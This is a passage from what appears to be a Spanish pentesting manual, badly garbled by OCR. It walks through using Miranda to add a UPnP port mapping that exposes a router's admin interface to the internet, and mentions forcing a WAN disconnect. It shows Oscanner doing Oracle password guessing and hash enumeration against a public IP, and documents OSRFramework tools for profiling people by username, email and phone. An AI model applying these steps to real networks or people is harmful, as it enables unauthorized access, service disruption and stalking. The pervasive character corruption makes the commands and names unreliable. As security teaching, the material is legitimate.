upnp> host info 0 devieeEist WANConneetionDeviee serviees WANIPConneetion aetions 
AddPortMapping : {} 

GetNATRSIPStatus : {} 

GetGeneriePortMappingEntry : {} 

GetSpeeifiePortMappingEntry : {} 

ForceTermination : {} 

GetExtemalIPAddress : {} 

GetConneetionTypeInfo : {} 

GetStatusInfo : {} 

SetConneetionType : {} 

DeletePortMapping : {} 

RequestConneetion : {} 

Dependiendo del dispositivo, pueden haber muehos datos en esta estruetura, así que si se quiere ver 
el resumen de los datos para un dispositivo determinado, ejeeutar el eomando ‘host summary’: 

upnp> host summary 0 
Host: 192.168.0.1:5678 
XME File: http://192.168.0.l:5678/igd.xml 
IntemetGatewayDeviee 
manufaeturerURL: http ://www. dlink. eom 
modelName: D-Eink Router 
UPC:123456789001 
modelNumber: None 
presentationURL: http://192.168.0.1:80 
friendlyName: D-Eink Router 

fullName: urn:sehemas-upnp-org:deviee:IntemetGatewayDeviee: 1 
modelDeseription: Internet Aeeess Router 
UDN: uuid:upnp-IntemetGatewayDeviee-1 0-12345678900001 
modelURL: None 
manufaeturer: D-Eink 
WANDeviee 

manufaeturerURL: http ://www. dlink. eom 



modelName: D-Link Router 
UPC:123456789001 
modelNumber: 1 
presentationURL; None 
friendlyName: WANDevice 

fullName: urn:schemas-upnp-org:device:WANDevice: 1 
modelDescription: Internet Aeeess Router 
UDN: uuid:upnp-WANDeviee-1 0-12345678900001 
modelURL: http://support.dlink.eom 
manufacturer: D-Link 
WANConneetionDeviee 

manufaeturerURL: http ://www. dlink. eom 
modelName: D-Link Router 
UPC:123456789001 
modelNumber: 1 
presentationURL: None 
friendlyName: WAN Connection Deviee 

fullName: urn:sehemas-upnp-org:device:WANConnectionDeviee: 1 
modelDeseription: Internet Aeeess Router 
UDN: uuid:upnp-WANConneetionDevice-l_0-12345678900001 
modelURL: http://support.dlink.com 
manufacturer: D-Link 

El comando de resumen nos muestra todos los tipos de dispositivos que este dispositivo reporta, asi 
como algún dato adicional relacionado con cada tipo de dispositivo. Si se quiere ver toda la 
información que Miranda almacena de un dispositivo en particular, se puede hacer con el comando 
‘host details 0’. Sin embargo la información suministrada por este comando es por lo general 
bastante larga, probablemente se quieras guardar en un archivo y verla en un editor de texto. Esto se 
puede hacer con el comando ‘save info 0’: 

upnp> save info 0 dl524 

Host info for '192.168.0.1:5678' saved to 'info_dl524.mir' 

El argumento ‘dl524’ es opcional. Si ninguna cadena es pasada como argumento, se usará entonces 
el número indice en su lugar. Mientras que estemos en la sesión, también podemos guardar los datos 
que Miranda ha almacenado sobre todos los dispositivos que han sido descubiertos, de modo que 
después podamos cargarlos de nuevo e iniciar una nueva sesión: 

upnp> save data sessionl 

Host data saved to 'struct sessionl.mir' 

Enviado comandos UPnP con Miranda 

Ahora vamos a explorar algunas de las acciones que podemos ejecutar en este dispositivo. 
Anteriormente cuando ejecutamos el comando ‘host info’, listamos todas las acciones disponibles 
para el servicio WANlPConnection que está asociado con el dispositivo WANConneetionDeviee. 
Veámoslas de nuevo: 

upnp> host info 0 deviceList WANConneetionDeviee Services WANlPConnection actions 
AddPortMapping : {} 

GetNATRSIPStatus : {} 

GetGenericPortMappingEntry : {} 

GetSpecificPortMappingEntry : {} 



ForceTermination : {} 

GetExtemalIPAddress : {} 

GetConnectionTypeInfo : {} 

GetStatusInfo : {} 

SetConnectionType : {} 

DeletePortMapping : {} 

RequestConnection : {} 

Como se puede ver, este servieio es el que soporta las aeeiones AddPortMapping y 
DeletePortMapping, así eomo algunas otras que pareeen interesantes. Primero intentaremos ejecutar 
la acción GetExtemalIPAddress y esto se puede hacer con el comando ‘host send’. Para ejecutar un 
comando, se debes indicar el número índice del dispositivo, el nombre del tipo de dispositivo que 
soporta el servicio, el nombre del servicio que soporta la acción y el nombre de la acción que se 
quiere ejecutar. 

upnp> host send 0 WANConnectionDevice WANIPConnection GetExtemalIPAddress 
NewExternalIPAddress : 68.12.34.56 

‘NewExtemalIPAddres’ es el nombre de la variable asociada con esta acción y ‘68.12.34.56’ es el 
valor devuelto para esta variable por el IGD. Algunas acciones tienen varias variables asociadas con 
ellas y estas variables pueden ser tanto de entrada (valores que le pasamos al IGS) o de salida 
(valores devueltos por el IGD). En el caso de la acción GetExtemalIPAddress, solo hay una variable 
de salida. Sin embargo si hay alguna variable de entrada disponible para una acción, Miranda nos 
pedirá que introduzcamos estos valores antes de enviar la acción. Toda la información de la variable 
puede ser enumerada/vista usando los comandos ‘host info’ o ‘host details’. No tenemos que tener 
ningún conocimiento sobre estas variables antes de ejecutar las acciones UPnP 

Intentemos mapear el puerto 8080 en la WAN para abrir la interfaz administrativa que está en el 
puerto 80 del IGD (I92.I68.0.I): 

upnp> host send 0 WANConnectionDevice WANIPConnection AddPortMapping 
Required argument: 

Argument Ñame: NewPortMappingDescription 
Data Type: string 
Allowed Valúes: [] 

Set NewPortMappingDescription valué to: All your ports are belong to us 
Required argument: 

Argument Ñame: NewEeaseDuration 
Data Type: ui4 
Allowed Valúes: [] 

Set NewEeaseDuration valué to: 0 
Required argument: 

Argument Ñame: NewInternalClient 
Data Type: string 
Allowed Valúes: [] 

Set NewInternalClient valué to: 192.168.0.1 
Required argument: 

Argument Ñame: NewEnabled 
Data Type: boolean 
Allowed Valúes: [] 

Set NewEnabled valué to: 1 
Required argument: 



Argument Ñame: NewExtemalPort 
Data Type: ui2 
Allowed Valúes: [] 

Set NewExtemalPort valué to: 8080 
Required argument: 

Argument Ñame: NewRemoteHost 
Data Type: string 
Allowed Valúes: [] 

Set NewRemoteHost valué to: 

Required argument: 

Argument Ñame: NewProtoeol 

Data Type: string 

Allowed Valúes: ['TCP', ’UDP’] 

Set NewProtoeol valué to: TCP 
Required argument: 

Argument Ñame: NewInternalPort 
Data Type: ui2 
Allowed Valúes: [] 

Set NewInternalPort valué to: 80 

Ea aeeión AddPortMapping recibe varios valores, pero hay unos puntos importantes que deben ser 
mencionados: 

1. Eos valores booleanos son ‘1’ (verdadero) o ‘0’ (falso) 

2. El argumento NewProtoeol solo permite 2 valores, ‘TCP’ o ‘UDP’ 

3. No se especificó ningún valor para la variable NewRemoteHost, la cual permite que todos los 
dispositivos remotos coincidan con esta asignación de puertos. 

No recibimos ningún dato de salida porque la acción AddPortMapping no tiene ninguna variable de 
salida definida. Sin embargo se puede verificar que la acción fúe ejecutada exitosamente lanzando 
la acción GetSpecificPortMappingEntry: 

upnp> host send 0 WANConnectionDevice WANIPConnection GetSpecificPortMappingEntry 
Required argument: 

Argument Ñame: NewExtemalPort 
Data Type: ui2 
Allowed Valúes: [] 

Set NewExtemalPort valué to: 8080 
Required argument: 

Argument Ñame: NewRemoteHost 
Data Type: string 
Allowed Valúes: [] 

Set NewRemoteHost valué to: 

Required argument: 

Argument Ñame: NewProtoeol 

Data Type: string 

Allowed Valúes: ['TCP', ’UDP'] 

Set NewProtoeol valué to: TCP 
NewPortMappingDescription : All your ports are belong to us 
NewEeaseDuration: 0 
NewInternalClient: 192.168.0.1 
NewEnabled : 1 
NewInternalPort: 80 



Ahora se puede borrar el puerto mapeado eon la aeeión DeletePortMapping. Igual que 
AddPortMapping, la aeeión DeletePortMapping no devuelve ningún dato a menos que haya 
oeurrido un error: 

upnp> host send 0 WANConneetionDeviee WANIPConneetion DeletePortMapping 
Required argument: 

Argument Ñame: NewProtoeol 

Data Type: string 

Allowed Valúes: ['TCP', ’UDP’] 

Set NewProtoeol valué to: TCP 
Required argument: 

Argument Ñame: NewExtemalPort 
Data Type: ui2 
Allowed Valúes: [] 

Set NewExtemalPort valué to: 8080 
Required argument: 

Argument Ñame: NewRemoteHost 
Data Type: string 
Allowed Valúes: [] 

Set NewRemoteHost valué to: 

Hay una gran multitud de otras aeeiones interesantes, eomo por ejemplo EoreeTermination, la eual 
provoea la eaída de la eonexión WAN del enmtador. 

Conclusión 

Si bien UPnP es un protoeolo que poeos entienden, está aetivo en una gran mayoría de redes loeales 
e ineluso también en algunas redes eorporativas. Muehos dispositivos soportan UPnP eon el fin de 
faeilitar su uso para los eonsumidores, sin embargo a menudo soportan aeeiones que ningún 
servicio debería de estar posibilitado de ejecutar automáticamente y especialmente sin ninguna 
autorización. Peor aún la implementación del protocolo rara vez es constmido con una mentalidad 
prioritaria en la seguridad, dejándolo abierto a fúturos ataques. 

Ea mejor defensa contra los ataques UPnP tanto locales como remotos es simplemente 
deshabilitarlo en algunos/todos los dispositivos de la red. Sin embargo la única verdadera solución 
es que los vendedores estén más atentos en sus diseños y sus implementaciones más seguras. 



83. Oscanner 


Oscanner es un marco de evaluación de Oracle desarrollado en Java. Tiene una arquitectura basada 
en plugin y viene con un par de complementos que actualmente hacen: 

• La enumeración del Sid 

• Las pruebas de contraseñas (común y diccionario) 

• Enumera la versión de Oracle 

• Enumera los roles de las cuentas 

• Enumera los privilegios de las cuentas 

• Enumera los hashes de las cuentas 

• Enumera la información de la auditoría 

• Enumera las políticas de contraseña 

• Enumera los enlaces de la base de datos. 

oscanner -s <ip> -r <repfile> -s <servername> -f <serverlist> -P <port> -v verbose 
Ea dirección IP es cualquiera, ya sea local o remota. 

Ejemplo 

root(a)kali:~# oscanner -s 216.58.204.14 -P 80 
Oracle Scanner 1.0.6 by patrik(a)cqure.net 


[-] Checking host 216.58.204.14 

[x] Failed to enumérate sids from host 

[-] Loading services/sids from Service file 

Plugin ork.plugins.CheckOracleVersión failed 

Plugin ork.plugins.GetPrivilegesForAccounts failed 

Plugin ork.plugins.GetRoles failed 

Plugin ork.plugins.GetPasswordPolicy failed 

Plugin ork.plugins.GetPasswordPolicyForAccounts failed 

Plugin ork.plugins.GetAccountHashes failed 

Plugin ork.plugins.GetPrivilegesForRoles failed 

Plugin ork.plugins.GetAuditInfo failed 





84. OSRFramework 


OSRFramework es un conjunto de bibliotecas GNU AGPLv3 + desarrollado por iSvisio para 
realizar tareas de recopilación de inteligencia de código abierto. Incluyen referencias a muchas 
aplicaciones diferentes relacionadas con la verificación de nombre de usuario, búsquedas de DNS, 
investigación de filtraciones de información, búsqueda profunda en la web, extracción de 
expresiones regulares y muchas otras. Al mismo tiempo, mediante transformaciones ad-hoc de 
Maltego, OSRFramework proporciona una forma de realizar estas consultas gráficamente, asi como 
varias interfaces para interactuar con OSRFConsole o una interfaz web. 

Si se requiere su instalación, en Kali Linux ejecutar 
pip install osrframework 
pip install osrframework —upgrade 

Las herramientas instaladas en este paquete incluyen; 

• alias generator. Genera apodos candidatos basados en información conocida sobre el 
objetivo. Entrada: información sobre el objetivo. Salida: lista de posibles apodos. 

• Checkfy. Adivina posibles correos electrónicos basados en una lista de apodos candidatos y 
un patrón. Entrada: lista de apodos y un patrón de correo electrónico. Salida: lista de correos 
electrónicos que coinciden con el patrón. 

• Domainfy. Encuentra los dominios que actualmente se resuelven usando una palabra o 
apodo dado. Entrada: lista de palabras. Salida: dominios que usan esa palabra que 
actualmente se resuelven. 

• Mailfy. Encuentra información sobre los correos electrónicos tomados como referencia, ya 
sea un apodo o la lista de correos electrónicos. Entrada: lista de apodos o correos 
electrónicos. Salida: información encontrada sobre el correo electrónico. 

• osrf. Contenedor compartido para el resto de las aplicaciones. Todos los comandos también 
se pueden usar como osrf usufy ..., osrf mailfy ..., etc. 

• phonefy. Recupera información sobre teléfonos móviles vinculados a prácticas de spam 
conocidas. Entradas: lista de teléfonos. Salidas: Teléfonos vinculados al spam. 

• Searchfy. Encuentra perfiles vinculados a un nombre completo. Entradas: lista de teléfonos. 
Salidas: Perfdes conocidos vinculados a la consulta. 

• usufy. Identifica perfiles de redes sociales usando un apodo dado. Entradas: lista de apodos. 
Salidas: Perfdes conocidos en medios sociales que usan esos apodos. 

Programa principal osrf 

Uso: osrf [-h] [—license] [—versión] <sub_command> <sub_command_options> ... 

También se puede escribir osrframework-cli en vez de osrf 

Ea opción <sub_command> <sub_command_options> es una de las siguiente 

• usufy ^ Esta herramienta verifica si existe un nombre de usuario en 291 plataformas. 

• mailfy ^ Herramienta para verificar si se ha registrado un nombre de usuario en hasta 22 
proveedores de correo electrónico. 

• searchfy ^ Herramienta para buscar perfiles usando nombres completos y otra información 
en 7 plataformas. 

• domainfy ^ Herramienta para verificar la existencia de un dominio dado en hasta 1567 
TED diferentes. 

• phonefy ^ Herramienta que verifica si un número de teléfono se ha vinculado a prácticas de 
spam en 4 plataformas. 

• entify ^ Una utilidad para buscar expresiones regulares usando 13 patrones. 



• alias-generator ^ Genera una lista de nombres de usuarios basado en una información 
conocida 

Módulo usufy 

Este programa verifica la existencia de un perfil para un usuario determinado en hasta 290 
plataformas diferentes. 

Uso; usufy 

(—info <action> | —license | -b | -f <path_to_fuzzing_list> | -1 <path_to_nick_list> 

I -n <nick> [<nick> ...] | —show_tags) 

[-p <platform> [<platform> ...]] [-t <tag> [<tag> ...]] 

[-X <platform> [<platform> ...]] [—avoid download] 

[—avoid_processing] [—fuzz config <path_to_fuzz_list>] 

[—nonvalid <not_valid_characters>] 

[-e <sum_ext> [<sum_ext> ...]] [-L <path_to_log_folder] [-m] 

[-0 <path_to_output_folder>] [-w] 

[-F <altemative_header_file>] [-T <num_threads>] [-h] 

[-V <verbosity>] [—versión] 


Opciones de entrada 
Se requiere como mínimo una. 


—info <action> 

Seleccionar la acción a realizar entre las siguientes; 

1. list_platforms - listar los detalles de las plataformas 
seleccionadas, 

2. list tags - listar las etiquetas de las plataformas seleccionadas. 

—license 

Muestra la licencia AGPLv3+. 

-b, —benchmark 

Realizar las tareas de benchmarking. 

-f <path to fuzzing list> 

—fuzz <path to fuzzing hst> 

Esta opción tratará de encontrar direcciones URL de uso 
habitual. La lista de plataformas fúzzing en el archivo debe ser 
una por línea;<BASE_DOMAIN> <VALID_NICK> 

-I <path to nick list> 

—list <path to nick list> 

Ruta al archivo donde se almacena la lista de nicks a verificar, 
uno por línea. 

-n <nick> [<nick> ...] 

—nicks <nick> [<nick> ...] 

Lista de apodos a procesar. Se requiere al menos uno. 

—show_tags 

Mostrará las plataformas agrupadas por etiquetas. 


Argumentos de selección de plataforma 

-p <platform> [<platform> ...], —platforms <platform> [<platform> ...] 

Criterios para seleccionar las plataformas donde se realiza la búsqueda. 

Seleccionar las plataformas donde se quiere realizar la búsqueda entre las siguientes; ['all', '500px', 
'abou', 'abouf, 'aífilorama', 'anarchylOl', 'ángel', 'archive', 'arduino', 'ariva', 'armorgames', 
'askfm','audiob', 'audioboo', 'authorstream', 'autospies', 'badoo', 'bandcamp', 'bebee', 'behance', 
'bennugd', 'betbiog', 'bitbuckef, 'bitcointa', 'bitcointalk', 'bitly', 'bitrated', 'blackplanef, 'blip', 
'blogmarks', 'blogspof, 'bookofmatches', 'boonex', 'bordom', 'boxedup', 'breakcom', 'bubok', 
'bucketlistly', 'buddypic', 'burbuja.info', 'burdastyle', 'buzznef, 'cafemom', 'canva', 'carbonmade', 
'cardinghispano', 'cardingmx', 'cardomain', 'care2', 'cartodb', 'cash', 'castroller', 'causes', 'ccm', 
'ccsinfo', 'chess', 'cockos', 'codecademy', 'codementor', 'coderwall', 'combase', 'colourlovers', 
'connectingsingles', 'contently', 'couchsurfmg', 'crokes', 'crowdin', 'cryptofresh', 'dailymotion', 
'datpiff, 'deviantarf, 'digitaispy', 'disqus', 'doodle', 'douban', 'dreamstime', 'dribbble'. 




’drugbuyersforum', ’drupal', ’dzone', ’ebay', 'echada', 'ehow', 'eightbitme', 'ello', 'elmundo', 
'emoneyspace', 'enfemenino', 'ethereum', 'etsy', 'eyeem', 'fós', 'facebook', 'fanpop', 'fark', 'favstar', 
'fiverr', 'flickr', 'flixster', 'foodspoding', 'forobtc', 'forocoches', 'foroptc', 'foros24h', 'forosperu', 
'forospyware', 'fotolog', 'foursquare', 'freelancer', 'freerepublic', 'gamesheep', 'gametracker', 
'gapyear', 'gather', 'geeksphone', 'genspot', 'getlocalization', 'getsatisfaction', 'github', 'goblinrefuge', 
'goodreads', 'googleplus', 'gravatar', 'gsmspain', 'hi5', 'houzz', 'htcmania', 'hubpages', 'ibosocial', 
'idéntica', 'ifunny', 'imgur', 'inkonsky', 'instagram', 'instructables', 'intfiction', 'islamicawakening', 
'issuu', 'ivoox', 'jamiiforums', 'kali', 'kanogames', 'karmacracy', 'keybase', 'kickstarter', 'kinja', 'kiwi', 
'klout', 'kongregate', 'kupika', 'lastfm', 'leakforums', 'linkedin', 'livejoumal', 'looki', 'losviajeros', 
'marca', 'matchdoctor', 'mcneel', 'mediavida', 'médium', 'meneame', 'mercadolibre', 'metacafe', 
'meteor', 'mig', 'migente', 'miiverse', 'minecraft', 'moneymaker', 'mozilla', 'musicasacra', 'myeloma', 
'myfitnesspal', 'myspace', 'nairaland', 'netlog', 'netvibes', 'newgrounds', 'notabug', 'occupywallst', 
'odnoklassniki', 'okcupid', 'onename', 'openbugbounty', 'openframeworks', 'openstreetmap', 

'papaly', 'pastebin', 'patreon', 'pearltrees', 'peerbackers', 'periscope', 'phishtank', 'photobucket', 
'pixinsight', 'pixls', 'pjrc', 'pokerred', 'pokerstrategy', 'pornhub', 'proboards', 'pz', 'qq', 
'quartermoonsaloon', 'rankia', 'rapid-i', 'rapidV, 'ratemypoo', 'realcarders', 'rebelmouse', 'reddit', 
'redtube', 'researchgate', 'reverbnation', 'ripenear', 'rojadirecta', 'ruby', 'sarahah', 'scribd', 'seatwish', 
'sencha', 'sidereel', 'singletrackworld', 'skype', 'slashdot', 'slideshare', 'smartcitizen', 'smugmug', 
'soundcloud', 'soup', 'sourceforge', 'spaniards', 'spoj', 'spotify', 'spreaker', 'squidoo', 
'steamcommunity', 'steemit', 'steinberg', 'streakgaming', 'taringa', 'teamtreehouse', 'techcrunch', 
'technorati', 'thehoodup', 'thesims', 'thestudentroom', 'theverge', 'tipme', 'tradimo', 'trakt', 
'translate_hola', 'trip', 'tripadvisor', 'tripit', 'trulla', 'tumblr', 'tune', 'tuporno', 'twicsy', 'twitch', 'twitter', 
'twoplustwo', 'typepad', 'unioncarder', 'ustream', 'v7n', 'venmo', 'vexforum', 'viddler', 'videohelp', 
'vimeo', 'virustotal', 'vk', 'warriorforum', 'webtv', 'wikia', 'wikipedia', 'winamp', 'wishlistr', 'widy', 
'wykop', 'xanga', 'xing', 'xtube', 'younow', 'youtube', 'zabbix', 'zentyal', 'zotero']. More than 
one option can be selected. 

-t <tag> [<tag> ...], — tags <tag> [<tag> ...] 

Seleccionar la lista de etiquetas que se ajustan a las plataformas en las que desea realizar la 
búsqueda. Se puede seleccionar más de una opción. 

-X <platform> [<platform> ...], —exelude <platform> [<platform> ...] 

Seleccionar las plataformas que se desea excluir del procesamiento. 

Argumentos del procesamiento 

Co nfigurando la forma en la que los usuarios procesarán los perfiles ídentífícados. _ 


—avoiddownload 

Argumento para obligar a los usuarios a NO 
almacenar la versión descargable de los perfiles. 

—avoid_processmg 

Argumento para obligar a los usuarios a NO 
realizar tareas de procesamiento con los perfiles 
válidos. 

—fuzz config <path to fuzz list> 

Ruta a los detalles de configuración de fuzzing. 

Los comodines, como los dominios o los apodos, 
deben ser como:<DOMAIN>, <USERNAME>. 

—nonvalid <not valid characters> 

Cadena que contiene los caracteres considerados 
no válidos para los apodos. 

-e <sum ext> [<sum ext> ...] 

—extensión <sum ext> [<sum ext> ...] 

Extensión de salida para los archivos de resumen. 
Predeterminado: XES 

-L <path_to_log_folder 
—logfolder <path_to_log_folder 

Ruta a la carpeta de registro. Si no se proporcionó 
ninguno, se supone ./logs. 




-m, —maltego 

Parámetro especificado para permitir a usufy.py 
saber que ha sido lanzado por una Transformada de 
Maltego. 

-0 <path_to_output_folder> 

—outputfolder <path_to_output_folder> 

Carpeta de salida para los documentos generados. 
Mientras que si las rutas no existen, usufy.py 
intentará crearlas. Si este argumento no se 
proporciona, el usuario NO anotará ningún dato. 

-w, —web_browser 

Abrir las URFs devueltas en el navegador web por 
defecto. 

-F <alternative header file> 

—file header <altemative header file> 

Encabezado para los nombres de archivo de salida 
que se generarán. Si se proporcionó None, se 
utilizará lo siguiente: perfiles. <Extension>. 

-T <num threads> 

—threads <num threads> 

Especificar el número de threads a utilizar. Por 
defecto 32. Si es 0, se utilizará el número máximo 
posible, lo que puede hacer que el sistema se sienta 
inestable. 


Argumentos varios: 


-h, —help 

Muestra esta ayuda y sale. 

-V <verbosity> 

—verbose <verbosity> 

Seleccionar en nivel de verbosidad: 0 - none; 1 - normal (por 
defecto); 2 - debug. 

—versión 

Muestra la versión del programa y sale. 


Ejemplo: usufy -n tuxGentoo 

Módulo mailfy 

Comprueba la existencia de un determinado correo 
Uso: mailfy.py 

(—license | -m <emails> [<emails> ...] | -M <emails_file> | -n <nicks> [<nicks> ...] 
I -N <nicks_file> | —create_emails <nicks_file>) 

[-e <sum_ext> [<sum_ext> ...]] 

[-d <candidate_domams> [<candidate_domains> ...]] 

[-0 <path_to_output_folder>] [-x <domam> [<domam> ...]] 

[-F <alternative_header_file>] [-T <num_threads>] 

[—is leaked] [—quiet] [-h] [—versión] 


Opciones de entrada 
Se requiere como mínimo uno. 


—license 

Muestra la licencia GPEv3+. 

-m <emails> [<emails> ...] 

—emails <emails> [<emails> ...] 

Eista de emails a verificar. 

-M <emails file> 

—emails file <emails file> 

El fichero con la lista de emails. 

-n <nicks> [<nicks> ...] 

—nicks <nicks> [<nicks> ...] 

Eista de apodos a verificar en los dominios 
seleccionados. 

-N <nicks file> 

—nicks file <nicks file> 

El archivo con la lista de apodos a ser verificados en los 
dominios seleccionados. 






—create emails <nicks file> 


El archivo con la lista de apodos que se erearán en los 
dominios seleeeionados. 


Argumentos de proeesamiento 

Configurando la forma en que se proeesarán los perfiles ídentífíeados. 


-e <sum ext> [<sum ext> ...] 

—extensión <sum ext> [<sum ext> ...] 

Extensión de salida para los arehivos de resumen. 
Predeterminado: XLS 

-d <oandidate domains> 

[<oandidate domains> ...] 

—domains <oandidate domains> 
[<oandidate_domains> ...] 

Eista de dominios donde se buseará el apodo. 

-0 <path_to_output_folder> 

—outputfolder <path_to_output_folder> 

Carpeta de salida para los doeumentos generados. 

Si las rutas no existen, usufy.py intentará erearlas. 

Si este argumento no se proporeiona, el usuario NO 
anotará ningún dato. 

-X <domain> [<domam> ...] 

—exelude <domain> [<domam> ...] 

Seleecionar los dominios a exeluir de la búsqueda. 

-E <alternative header file> 

—file header <alternative header file> 

Eneabezado para los nombres de arehivo de salida 
que se generarán. Si no se proporeionó None, se 
utilizará lo siguiente: profiles.<extension>. 

-T <num threads> 

—threads <num threads> 

Espeeifiear la eantidad de threads a utilizar. Por 
defeeto 16. Si es 0, se utilizará el número máximo 
posible, lo que puede haeer que el sistema se sienta 
inestable. 

—isleaked 

Definir si mailfy.py debe buscar correos 
eleetrónicos filtrados en lugar de verifiearlos. 

—quiet 

Ee diee al programa que no muestre nada. 


Otros argumentos: Mostrar la informaeión adieional sobre este programa, 
-h, —help muestra esta ayuda y sale. 

—versión muestra la versión del programa y sale. 

Ejemplo: mailíy -n tuxGentoo 

Módulo searchfy 

Realiza una eonsulta en las plataformas en OSREramework. 

Uso: searehfy (—lieense | -q <searohes> [<searohes> ...]) 

[-e <sum_ext> [<sum_ext> ...]] 

[-E <alternative_header_file>] [-m] 

[-0 <path_to_output_folder>] 

[-p <platform> [<platform> ...]] [—proeess] [-w] 

[-X <platform> [<platform> ...]] [-h] [—versión] 

Opciones de entrada 

Se requiere eomo mínimo una. 


—lieense 

Muestra la bceneia GPEv3+. 

-q <searehes> [<searehes> ...] 

—queries <searehes> [<searehes> ...] 

Eista de eonsultas a realizar. 






Argumentos de proeesamiento 

Configurando la forma en que se proeesarán los perfiles identifieados. 


-e <sum ext> [<sum ext> ...] 

—extensión <sum ext> [<sum ext> ...] 

Extensión de salida para los arehivos de resumen. 
Predeterminado: XES 

-F <alternative header file> 

—file header <alternative header file> 

Eneabezado para los nombres de arehivo de salida 
que se generarán. Si se proporeionó None, se 
utilizará lo siguiente: profiles.<extension> 

-m, —maltego 

Parámetro espeeificado para dejarle saber a 
usufy.py que ha sido lanzado por una 

Transformada de Maltego. 

-0 <path_to_output_folder> 

—outputfolder <path_to_output_folder> 

Carpeta de salida para los doeumentos generados. 
Mientras que si las rutas no existen, usufy.py los 
intentará erear. Si este argumento no se 
proporeiona, el usuario NO anotará ningún dato. 

-p <platform> [<platform> ...] 

—platforms <platform> [<platform> ...] 

Seleeeionar las plataformas donde se quiere 
realizar la búsqueda entre los siguientes: ['alf, 
’faeebook', ’github', ’pgpmif, ’skype', ’twitter', 
’youtube']. Seleeeionar eomo mínimo una opeión. 

—proeess 

Proeesar la informaeión en los perfiles 
recuperados. Con esta opción es mucho más lento. 

-w, —web_browser 

Abrir las URL devueltas en el navegador web 
predeterminado. 

-X <platform> [<platform> ...] 

—exelude <platform> [<platform> ...] 

Seleccionar las plataformas que desea excluir del 
procesamiento. 


Otros argumentos: Mostrar la informaeión adieional sobre este programa, 
-h, —help muestra esta ayuda y sale. 

—versión muestra la versión del programa y sale. 

Ejemplo: searehfy -q “Ivan Petrov” 

Módulo domainfy 

Comprobar la existeneia de dominios. 

Uso: domainfy (—license | -n <nioks> [<nioks> ...] | -N <nioks_file>) 

[-e <sum_ext> [<sum_ext> ...]] [-0 <path_to_output_folder>] 
[-t <tld_type> [<tld_type> ...]] 

[-U <new_tld> [<new_tld> ...]] [-x <domam> [<domain> ...]] 
[-F <alternative_header_file>] [-T <num_threads>] [—quiet] 
[-h] [—versión] 


Opeiones de entrada 

Sse requiere eomo mínimo una. 


—license 

Muestra la licencia GPLv3+. 

-n <nicks> [<nicks> ...] 

—nicks <nicks> [<nicks> ...] 

Lista de apodos a verificar en los dominios seleccionados. 

-N <nicks file> 

—nicks file <nicks file> 

El archivo con la lista de apodos para ser verificados en los 
dominios seleccionados. 





Argumentos de proeesamiento 

Configurando la forma en que se proeesarán los perfiles identifieados. 


-e <sum ext> [<sum ext> ...] 

—extensión <sum ext> [<sum ext> ...] 

Extensión de salida para los archivos de resumen. 
Predeterminado: XFS 

-0 <path_to_output_folder> 

—outputfolder <path_to_output_folder> 

Carpeta de salida para los documentos generados. 
Mientras que si las rutas no existen, usufy.py 
intentará crearlas. Si este argumento no se 
proporciona, el usuario NO anotará ningún dato. 

-t <tld_type> [<tld_type> ...] 

—tlds <tld_type> [<tld_type> ...] 

Fista de tipos de tld donde se buscará el apodo. 

-u<new_tld> [<new_tld> ...] 

—user defmed <new_tld> [<new_tld> ...] 

TFD adicional que será buscado. 

-X <domam> [<domam> ...] 

—exelude <domam> [<domam> ...] 

Seleccionar los dominios a evitar. El formato debe 
incluir la inicial 

-F <altemative header file> 

—file header <alternative header file> 

Encabezado para los nombres de archivo de salida 
que se generarán. Si no se proporcionó ninguno, se 
utilizará lo siguiente: profiles.<extension>. 

-T <num threads> 

—threads <num threads> 

Especificar la cantidad de threads a utilizar. Por 
defecto 16. Si es 0, se utilizará el número máximo 
posible, lo que puede hacer que el sistema se sienta 
inestable. 

—quiet 

Ee dice al programa que no muestre nada. 


Otros argumentos: Mostrar la información adicional sobre este programa, 
-h, —help muestra esta ayuda y sale. 

—versión muestra la versión del programa y sale. 

Ejemplo: domainíy -n miloserdov -t all 

Módulo phonefy 

Comprueba la existencia de una serie dada de teléfonos 

Uso: phonefy (—license | -n <phones> [<phones> ...]) 

[-e <sum_ext> [<sum_ext> ...]] [-0 <path_to_output_folder>] 
[-p <platform> [<platform> ...]] 

[-F <altemative_header_fde>] [—quiet] [-w] 

[-X <platform> [<platform> ...]] [-h] [—versión] 

Opciones de entrada 

—license muestra la licencia GPLv3+. 

-n <phones> [<phones> ...], —numbers <phones> [<phones> ...] 

la lista de teléfonos a procesar. Se requiere al menos uno. 

Argumentos de procesamiento 

Configurando la forma en que se procesarán los perfiles identificados. 


-e <sum ext> [<sum ext> ...] 

—extensión <sum ext> [<sum ext> ...] 

Extensión de salida para los archivos de resumen. 
Predeterminado: XES 

-0 <path_to_output_folder> 

Carpeta de salida para los documentos generados. 



—outputfolder <path_to_output_folder> 

Mientras que si las rutas no existen, usufy.py 
intentará crearlas. Si este argumento no se 
proporciona, el usuario NO anotará ningún dato. 

-p <pIatform> [<pIatform> ...] 

—platforms <pIatform> [<pIatform> ...] 

Seleccionar las plataformas donde desea realizar 
la búsqueda entre las siguientes: ['all', 

’infote le fónica', 'kimatel', 'listaspam']. Se puede 
seleccionar más de una opción. 

-F <altemative header file> 

—file header <alternative header file> 

Encabezado para los nombres de archivo de salida 
que se generarán. Si no se proporcionó ninguno, 
se utilizará lo siguiente: profiles.<extension>. 

—quiet 

Fe dice al programa que no muestre nada. 

-w, —web_browser 

Abrir las URF devueltas en el navegador web 
predeterminado. 

-X <pIatform> [<pIatform> ...] 

—exelude <pIatform> [<pIatform> ...] 

Seleccionar las plataformas que desea excluir del 
procesamiento. 


Otros argumentos: Mostrar la información adicional sobre este programa. 

-h, —help muestra esta ayuda y sale. 

—versión muestra la versión del programa y sale. 

Módulo entify 

Se trata de un programa diseñado para extraer usando expresiones regulares todas las entidades de 
los archivos en una carpeta determinada. Este programa también proporciona una interfaz para 
buscar estas entidades en cualquier texto dado. 

Uso: entify (-r <name> [<name> ...] | -R <regular_expression>) 

(-i <path_to_input_folder> | -w <url>) 

[-e <sum_ext> [<sum_ext> ...]] [-0 <path_to_output_folder>] 

[-V <verbosity>] [-F <altemative_header_file>] [-q] 

[-L <path_to_log_folder] [—recursive] [-h] [—versión] 


Opciones de entrada 
Se requiere como mínimo una 


-r <name> [<name> ...] 

—regexp <name> [<name> ...] 

Seleccionar las expresiones regulares a buscar entre 
las siguientes: ['all', 'iSvisio.bitcoin.address', 
'iSvisio.dni', 'iSvisio.dogecoin.address', 'iSvisio.email', 
'i3visio.ipv4', 'iSvisio.litecoin.address', 'i3visio.md5', 
'i3visio.namecoin.address', 

